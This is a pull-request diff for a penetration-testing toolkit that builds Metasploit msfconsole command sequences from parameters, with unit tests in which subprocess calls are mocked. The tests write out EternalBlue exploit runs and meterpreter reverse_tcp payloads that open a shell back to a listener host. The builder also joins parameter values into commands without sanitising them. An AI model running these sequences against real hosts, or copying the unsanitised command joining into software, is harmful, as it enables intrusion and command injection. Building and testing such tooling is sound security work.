Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 2 additions & 1 deletion .claude/settings.local.json
Original file line number Diff line number Diff line change
@@ -1,7 +1,8 @@
{
"permissions": {
"allow": [
"Bash(make lint)"
"Bash(make lint)",
"Bash(uv run pytest:*)"
],
"deny": []
}
Expand Down
1 change: 1 addition & 0 deletions wish-tools/src/wish_tools/framework/base.py
Original file line number Diff line number Diff line change
Expand Up @@ -48,6 +48,7 @@ class CommandInput(BaseModel):

command: str = Field(description="The command to execute")
timeout_sec: int = Field(default=300, description="Timeout in seconds")
tool_parameters: Dict[str, Any] = Field(default_factory=dict, description="Tool-specific parameters")


class ToolResult(BaseModel):
Expand Down
47 changes: 46 additions & 1 deletion wish-tools/src/wish_tools/tools/msfconsole.py
Original file line number Diff line number Diff line change
Expand Up @@ -105,8 +105,10 @@ async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -
start_time = time.time()

try:
# Build command sequence from tool_parameters or use raw command
msf_command = self._build_command_sequence(command)
# Prepare msfconsole command with proper formatting
msf_command = self._prepare_msf_command(command.command)
msf_command = self._prepare_msf_command(msf_command)

# Run msfconsole in non-interactive mode
process = await asyncio.create_subprocess_exec(
Expand Down Expand Up @@ -341,3 +343,46 @@ def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]:
return False, f"Potentially dangerous module detected: {dangerous}"

return True, None

def _build_command_sequence(self, command_input: CommandInput) -> str:
"""Build MSF command sequence from tool_parameters or use raw command."""
# If tool_parameters are provided and contain module, build from parameters
if (command_input.tool_parameters and
command_input.tool_parameters.get('module')):
return self._build_from_parameters(command_input)

# Otherwise use the original command string (backward compatibility)
return command_input.command

def _build_from_parameters(self, command_input: CommandInput) -> str:
"""Build command sequence from tool_parameters."""
params = command_input.tool_parameters
commands = []

# 1. use command for module
if "module" in params:
commands.append(f"use {params['module']}")

# 2. set commands for parameters
for param_name, param_value in params.items():
if param_name != "module" and param_value is not None:
msf_param = self._map_to_msf_parameter(param_name)
commands.append(f"set {msf_param} {param_value}")

# 3. execution command
commands.append(command_input.command)

return "; ".join(commands)

def _map_to_msf_parameter(self, param_name: str) -> str:
"""Map tool parameter names to MSF parameter names."""
mapping = {
"rhosts": "RHOSTS",
"rhost": "RHOST",
"lhost": "LHOST",
"lport": "LPORT",
"rport": "RPORT",
"payload": "PAYLOAD",
"target": "TARGET"
}
return mapping.get(param_name, param_name.upper())
294 changes: 294 additions & 0 deletions wish-tools/tests/test_msfconsole_tool.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,294 @@
"""
Tests for MsfconsoleTool implementation.

This module contains tests for the MsfconsoleTool functionality
including parameter-based command generation and backward compatibility.
"""

import tempfile
from unittest.mock import AsyncMock, patch

import pytest

from wish_tools.framework import CommandInput, ToolContext
from wish_tools.tools.msfconsole import MsfconsoleTool


class TestMsfconsoleTool:
"""Test MsfconsoleTool functionality."""

def test_build_command_sequence_with_parameters(self):
"""Test building command sequence from tool_parameters."""
tool = MsfconsoleTool()

# Create command with tool_parameters
command = CommandInput(
command="exploit",
timeout_sec=300,
tool_parameters={
"module": "exploit/windows/smb/ms17_010_eternalblue",
"rhosts": "10.10.10.40",
"lhost": "10.10.14.1",
"lport": "4444"
}
)

result = tool._build_command_sequence(command)

expected = (
"use exploit/windows/smb/ms17_010_eternalblue; "
"set RHOSTS 10.10.10.40; set LHOST 10.10.14.1; set LPORT 4444; exploit"
)
assert result == expected

def test_build_command_sequence_backward_compatibility(self):
"""Test backward compatibility with raw command strings."""
tool = MsfconsoleTool()

# Create command with raw command string (no tool_parameters)
command = CommandInput(
command="use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.40; exploit",
timeout_sec=300
)

result = tool._build_command_sequence(command)

# Should return the raw command unchanged
assert result == "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.40; exploit"

def test_build_command_sequence_empty_parameters(self):
"""Test with empty tool_parameters."""
tool = MsfconsoleTool()

# Create command with empty tool_parameters
command = CommandInput(
command="search ms17_010",
timeout_sec=300,
tool_parameters={}
)

result = tool._build_command_sequence(command)

# Should return the raw command since no module is specified
assert result == "search ms17_010"

def test_build_from_parameters_auxiliary_module(self):
"""Test building command for auxiliary module."""
tool = MsfconsoleTool()

command = CommandInput(
command="run",
timeout_sec=300,
tool_parameters={
"module": "auxiliary/scanner/smb/smb_version",
"rhosts": "192.168.1.0/24",
"rport": "445"
}
)

result = tool._build_from_parameters(command)

expected = "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; set RPORT 445; run"
assert result == expected

def test_build_from_parameters_with_payload(self):
"""Test building command with payload parameter."""
tool = MsfconsoleTool()

command = CommandInput(
command="exploit",
timeout_sec=600,
tool_parameters={
"module": "exploit/multi/handler",
"payload": "windows/meterpreter/reverse_tcp",
"lhost": "192.168.1.10",
"lport": "4444"
}
)

result = tool._build_from_parameters(command)

expected = (
"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; "
"set LHOST 192.168.1.10; set LPORT 4444; exploit"
)
assert result == expected

def test_build_from_parameters_with_target(self):
"""Test building command with target parameter."""
tool = MsfconsoleTool()

command = CommandInput(
command="exploit",
timeout_sec=600,
tool_parameters={
"module": "exploit/windows/smb/ms17_010_eternalblue",
"rhosts": "10.10.10.40",
"target": "0",
"lhost": "10.10.14.1"
}
)

result = tool._build_from_parameters(command)

expected = (
"use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.40; "
"set TARGET 0; set LHOST 10.10.14.1; exploit"
)
assert result == expected

def test_map_to_msf_parameter(self):
"""Test parameter name mapping."""
tool = MsfconsoleTool()

# Test standard mappings
assert tool._map_to_msf_parameter("rhosts") == "RHOSTS"
assert tool._map_to_msf_parameter("rhost") == "RHOST"
assert tool._map_to_msf_parameter("lhost") == "LHOST"
assert tool._map_to_msf_parameter("lport") == "LPORT"
assert tool._map_to_msf_parameter("rport") == "RPORT"
assert tool._map_to_msf_parameter("payload") == "PAYLOAD"
assert tool._map_to_msf_parameter("target") == "TARGET"

# Test unmapped parameter (should be uppercase)
assert tool._map_to_msf_parameter("custom_param") == "CUSTOM_PARAM"

def test_build_from_parameters_none_values_filtered(self):
"""Test that None values are filtered out."""
tool = MsfconsoleTool()

command = CommandInput(
command="exploit",
timeout_sec=300,
tool_parameters={
"module": "exploit/windows/smb/ms17_010_eternalblue",
"rhosts": "10.10.10.40",
"lhost": "10.10.14.1",
"lport": None, # This should be filtered out
"payload": None # This should be filtered out
}
)

result = tool._build_from_parameters(command)

expected = "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.40; set LHOST 10.10.14.1; exploit"
assert result == expected

def test_build_from_parameters_complex_example(self):
"""Test building complex command with multiple parameters."""
tool = MsfconsoleTool()

command = CommandInput(
command="exploit",
timeout_sec=600,
tool_parameters={
"module": "exploit/windows/smb/ms17_010_eternalblue",
"rhosts": "10.10.10.40-50",
"rhost": "10.10.10.40", # Both rhost and rhosts
"lhost": "10.10.14.1",
"lport": "4444",
"payload": "windows/x64/meterpreter/reverse_tcp",
"target": "0",
"custom_option": "custom_value"
}
)

result = tool._build_from_parameters(command)

# Check that all parameters are included (order may vary due to dict iteration)
assert "use exploit/windows/smb/ms17_010_eternalblue" in result
assert "set RHOSTS 10.10.10.40-50" in result
assert "set RHOST 10.10.10.40" in result
assert "set LHOST 10.10.14.1" in result
assert "set LPORT 4444" in result
assert "set PAYLOAD windows/x64/meterpreter/reverse_tcp" in result
assert "set TARGET 0" in result
assert "set CUSTOM_OPTION custom_value" in result
assert result.endswith("; exploit")

@pytest.mark.asyncio
@patch('asyncio.create_subprocess_exec')
async def test_execute_with_tool_parameters(self, mock_subprocess):
"""Test execute method with tool_parameters integration."""
# Mock the subprocess execution
mock_process = AsyncMock()
mock_process.communicate.return_value = (b"Test output", b"")
mock_process.returncode = 0
mock_subprocess.return_value = mock_process

tool = MsfconsoleTool()

with tempfile.TemporaryDirectory() as temp_dir:
context = ToolContext(working_directory=temp_dir, run_id="test")

command = CommandInput(
command="exploit",
timeout_sec=300,
tool_parameters={
"module": "exploit/windows/smb/ms17_010_eternalblue",
"rhosts": "10.10.10.40",
"lhost": "10.10.14.1"
}
)

result = await tool.execute(command, context)

# Verify subprocess was called with correct parameters
assert mock_subprocess.called
call_args = mock_subprocess.call_args[0]
assert call_args[0] == "msfconsole"
assert call_args[1] == "-q"
assert call_args[2] == "-x"

# The command should be built from parameters
executed_command = call_args[3]
assert "use exploit/windows/smb/ms17_010_eternalblue" in executed_command
assert "set RHOSTS 10.10.10.40" in executed_command
assert "set LHOST 10.10.14.1" in executed_command
assert "exploit" in executed_command
assert "exit -y" in executed_command

# Verify result
assert result.success is True
assert result.output == "Test output"

@pytest.mark.asyncio
@patch('asyncio.create_subprocess_exec')
async def test_execute_backward_compatibility(self, mock_subprocess):
"""Test execute method maintains backward compatibility."""
# Mock the subprocess execution
mock_process = AsyncMock()
mock_process.communicate.return_value = (b"Test output", b"")
mock_process.returncode = 0
mock_subprocess.return_value = mock_process

tool = MsfconsoleTool()

with tempfile.TemporaryDirectory() as temp_dir:
context = ToolContext(working_directory=temp_dir, run_id="test")

# Use raw command string without tool_parameters
command = CommandInput(
command="use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.40; exploit",
timeout_sec=300
)

result = await tool.execute(command, context)

# Verify subprocess was called with the raw command
assert mock_subprocess.called
call_args = mock_subprocess.call_args[0]
executed_command = call_args[3]
expected_cmd = (
"use exploit/windows/smb/ms17_010_eternalblue; "
"set RHOSTS 10.10.10.40; exploit; exit -y"
)
assert expected_cmd == executed_command

# Verify result
assert result.success is True
assert result.output == "Test output"


if __name__ == "__main__":
pytest.main([__file__])